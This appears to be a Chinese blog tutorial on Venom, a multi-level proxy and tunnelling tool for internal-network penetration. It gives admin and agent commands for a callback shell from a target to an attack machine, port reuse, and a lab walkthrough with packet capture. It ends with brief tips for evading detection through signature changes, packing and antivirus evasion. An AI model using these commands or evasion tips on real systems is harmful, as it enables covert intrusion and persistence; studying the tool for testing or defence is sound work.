目录

  • 前言
  • 一、概述
    • 1、简介
    • 2、原理
    • 3、用法
      • (1)服务端
      • (2)客户端
      • (3)加密
      • (4)三层代理
  • 二、实践
    • 1、测试场景
    • 2、建立隧道
      • (1)服务端
      • (2)客户端
    • 3、抓包看看
  • 三、探索
    • 1、源码与分析
    • 2、检测与绕过
      • (1)特征字符串和特征码
      • (2)端口控制
      • (3)进程和库调用
      • (4)SOCKS代理的检测
  • 结语

前言

本文研究端口转发&SOCKS5&SSH的一个工具,Venom

github:https://github.com/Dliv3/Venom/

一、概述

1、简介

玄武实验室的Dliv3作品,最后更新于2019年,用Go编写,多级代理工具,功能极强,但是现在基本被各大杀软查杀了(需做好免杀)

  • 多级socks5代理
  • 多级端口转发
  • 端口复用 (apache/mysql/…)
  • ssh隧道
  • 交互式shell
  • 文件的上传和下载
  • 节点间通信加密
  • 支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)

2、原理

TCP连接,可直接获取shell,也可端口转发或SOCKS代理

3、用法

(1)服务端

监听

./admin_macos_x64 -lport 9999

内置命令

  • help 打印帮助信息
  • show 显示网络拓扑
  • goto 操作某节点
  • getdes/setdes 获取/设置节点信息描述
  • connect/listen/sshconnect 节点间互连
  • shell 获取节点的交互式shell
  • upload/download 向节点上传/从节点下载文件
  • socks 建立到某节点的socks5代理
  • lforward/rforward 将本地端口转发到远程/将远程端口转发到本地

(2)客户端

发起

./agent_linux_x64 -rhost <server-ip> -rport 9999

端口复用

  • 通过SO_REUSEPORT和SO_REUSEADDR选项进行端口复用

    # 以windows下apache为例
    # 复用apache 80端口,不影响apache提供正常的http服务
    # -lhost 的值为本机ip,不能写0.0.0.0,否则无法进行端口复用
    ./agent.exe -lhost 192.168.204.139 -reuse-port 80
    ./admin_macos_x64 -rhost 192.168.204.139 -rport 80
    
  • 通过iptables进行端口复用(仅支持Linux平台)

    # 以linux下apache为例
    # 需要root权限
    sudo ./agent_linux_x64 -lport 8080 -reuse-port 80
    

(3)加密

# 通过-passwd指定密码为dlive@dubhe
./admin_macos_x64 -lport 8889 -passwd dlive@dubhe# agent指定相同的密码与admin节点连接
./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe

(4)三层代理

可参考

  • 内网代理神器Venom及三层代理演示
  • 内网穿透工具—Venom使用教程

二、实践

1、测试场景

攻击机(服务端):kali 192.168.10.128
目标机(客户端):ubuntu 192.168.10.129

都没有限制TCP连接

2、建立隧道

(1)服务端

./admin_linux_x64 -lport 2222

(2)客户端

./agent_linux_x64 -rhost 192.168.10.128 -rport 2222

3、抓包看看

TCP连接


获取shell

ls命令,这里是明文,因为用的时候没有进行加密



socks

三、探索

1、源码与分析

源码架构非常清晰,注释详细,可直接看

2、检测与绕过

(1)特征字符串和特征码

命令和log里的特征字符串可以作为检测特征
然后是代码里的特征码

绕过方法:修改掉相应的特征

(2)端口控制

做好端口控制

绕过方法:端口复用

(3)进程和库调用

通过终端的进程链控制和第三方库的调用情况在做检测

绕过方法:白进程利用,尽可能不调用库,加壳,主要是木马免杀那套

(4)SOCKS代理的检测

这是IDS这块,具体原理不清

结语

venom也是赫赫有名了,所以查杀理所当然都安排上了

内网渗透系列:内网隧道之Venom相关推荐

  1. 内网渗透系列:内网隧道之ICMP隧道

    目录 前言 一.ICMP隧道技术 1.ICMP协议 (1)报文格式 (2)ping 2.ICMP隧道 (1)原理 (2)优缺点 二.ICMP隧道工具 1.icmpsh (1)源码 (2)用法 2.ic ...

  2. 内网渗透系列:内网隧道之pingtunnel

    目录 前言 一.概述 1.简介 2.原理 3.使用 (1)直连出网 (2)跳板出网 二.实践 1.场景 2.建立隧道 (1)攻击机 (2)目标机 (3)nc 3.抓包看看 三.探索 1.源码与分析 ( ...

  3. 内网渗透系列:内网隧道之icmpsh

    目录 前言 一.概述 1.简介 2.原理 3.使用 二.实践 1.场景 2.建立隧道 (1)攻击机 (2)目标机 (3)隧道建立成功 3.抓包看看 三.探索 1.源码与分析 (1)客户端 (2)服务端 ...

  4. 内网渗透系列:内网信息搜集方法小结2

    目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...

  5. 内网渗透系列之mimikatz的使用以及后门植入

    内网渗透系列之mimikatz的使用以及后门植入 文章目录 内网渗透系列之mimikatz的使用以及后门植入 前言 mimikatz的使用 后门植入 msf永久后门植入 (1)Meterpreter后 ...

  6. 内网渗透系列:信息搜集方法小结2

    目录 前言 一.开源情报(OSINT) 1.whois/反查/相关资产 2.github敏感信息 (1)github邮箱密码爬取 (2)GSIL (3)x-patrol 3.google hackin ...

  7. 内网渗透-Linux内网渗透

    系列文章目录 文章目录 系列文章目录 一.Linux内网渗透 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH ...

  8. 内网渗透(十三)之内网信息收集-收集域环境中的基本信息

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  9. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

  10. ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术

    hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH="整数" 和 HIGH="整数". 1. 隐藏通信隧道基础 ...

最新文章

  1. docker 自定义网桥
  2. tostring、(string)和 String.valueOf()
  3. 哈密尔顿算法matlab,复杂制造过程最优哈密尔顿圈算法的MATLAB仿真与分析.doc
  4. 视觉SLAM十四讲(1):预备知识
  5. NeurIPS2021 MBT:多模态数据怎么融合?谷歌提出基于注意力瓶颈的方法,简单高效还省计算量...
  6. js拦截物联返回键跳转到指定页面
  7. 【Kafka】kafka Failed to acquire lock on file .lock in /data/kafak-logs a kafka instance
  8. 法国电信:5G加速数字化落地 物联网是首座金矿
  9. 文件下的所有文本内容转为一个csv文件代码
  10. VMware虚拟网络设置(NAT模式,桥接模式,仅主机模式设置),再也不用担心虚拟机连不上网了。
  11. Javascript中的条件语句和循环语句
  12. 精确到门牌号的地图_IP地址精准查询工具:能精确到门牌号
  13. 精益思想如何加速企业的全局价值流动?
  14. 关于利用背景减除法的固定摄像头的移动侦测算法
  15. 解析十大网络防骗术 全面防范网络欺诈
  16. redis连接与关闭
  17. 【数据异常校验】拉依达准则( PauTa Criterion 或 3σ准则) 处理异常数据
  18. C++快慢指针理解与应用
  19. 小试牛刀 python股票查询程序
  20. Java基础05-面向对象private\this\static关键字

热门文章

  1. 影响力最大化算法——degreediscount以及python实现代码
  2. python opencv实现 12色相环、24色相环(基于RGB空间和基于HSV空间实现)
  3. java混淆工具zelix比较_Java混淆器和java混淆编译
  4. 豆客服务器不稳定,豆客平台登陆器
  5. 《数据库应用》课程设计人事管理系统(java源代码)
  6. xp系统怎么telnet服务器,xp操作系统如何开启telnet服务?
  7. sap 服务器文件 暴露pdf地址,访问地址预览
  8. Cardhop for Mac(通讯录管理软件)
  9. UI自动化报错Can not connect to the Service解决方案
  10. 精简、root康佳电视升级包LED37R5200PDF(晨星Mstar),工具mstar-bin-tool等